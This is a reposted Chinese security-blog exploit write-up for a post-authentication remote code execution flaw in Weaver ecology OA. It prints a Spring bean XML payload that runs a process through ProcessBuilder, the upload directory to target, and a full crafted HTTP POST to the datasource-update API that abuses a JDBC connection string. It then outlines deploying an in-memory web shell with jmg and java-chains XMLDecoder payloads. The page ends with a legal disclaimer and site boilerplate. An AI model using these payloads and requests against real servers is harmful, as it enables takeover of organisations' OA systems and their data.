<?xml version="1.0"&nbsp;encoding="UTF-8"?><!DOCTYPE&nbsp;beans&nbsp;PUBLIC&nbsp;"-//SPRING//DTD BEAN 2.0//EN"&nbsp;&nbsp; &nbsp;&nbsp;"http://www.springframework.org/dtd/spring-beans-2.0.dtd"><beans>&nbsp; &nbsp;&nbsp;<bean&nbsp;id="rce"&nbsp;class="java.lang.ProcessBuilder"&nbsp;init-method="start">&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<constructor-arg>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<list>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<value>calc.exe</value>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</list>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</constructor-arg>&nbsp; &nbsp;&nbsp;</bean></beans>

上传目录

c:/weaver/ecology/page/resource/userfile

jdbc rce

新建个数据源构造如图

此接口会根据传入的type的值去数据库中查找jdbc链接字符串

POST&nbsp;/api/integration/datasource/update HTTP/1.1Host:&nbsp;192.168.188.133Content-Length:&nbsp;211X-Requested-With: XMLHttpRequestAccept-Language: zh-CN,zh;q=0.9User-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;10.0; Win64; x64) AppleWebKit/537.36&nbsp;(KHTML, like Gecko) Chrome/138.0.0.0&nbsp;Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=utf-8Accept: */*Origin: http://192.168.188.133Referer: http://192.168.188.133/wui/engine.htmlAccept-Encoding: gzip, deflate, brCookie: ecology_JSessionid=aaaMDiWTJbN8q-hTlFlHz; JSESSIONID=aaaMDiWTJbN8q-hTlFlHz; loginidweaver=1; languageidweaver=7; loginuuids=1; __randcode__=8baff628-3ec6-493e-bcee-ed120a32cce8Connection: keep-alive
pointid=a12&type=sqlserver20011273983191&iscluster=1&host=%3FsocketFactory&port=123&dbname=1&url=&username=2&password=%2Fc4Q2hAVXFc%3DJ%2FE%2FXI7W3d0%3D&usepool=1&minconn=5&maxconn=10&sortid=5&id=7&operate=test&

从数据库里面找对应的driverclass,driverurl。进行动态填充

最终触发jdbc rce,实际上higo driver就是psgresql

泛微的安全机制,此处抛出异常,无法执行cmd命令

注入内存马

生成内存马的数据可以使用jmg来生成

生成xmldecodepayload

这边是封装了俩层,javachains生成的数据需要做处理

连接成功

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:dmd5安全 dmd5安全《泛微后台RCE漏洞》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
泛微后台RCE漏洞 网络安全文章

泛微后台RCE漏洞

文章总结: 文档披露了泛微OA系统后台远程代码执行漏洞的利用细节。攻击者可通过移动端设计器接口进行SQL注入并绕过安全检测,或利用文件上传接口上传恶意XML文件
12-300 评论
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0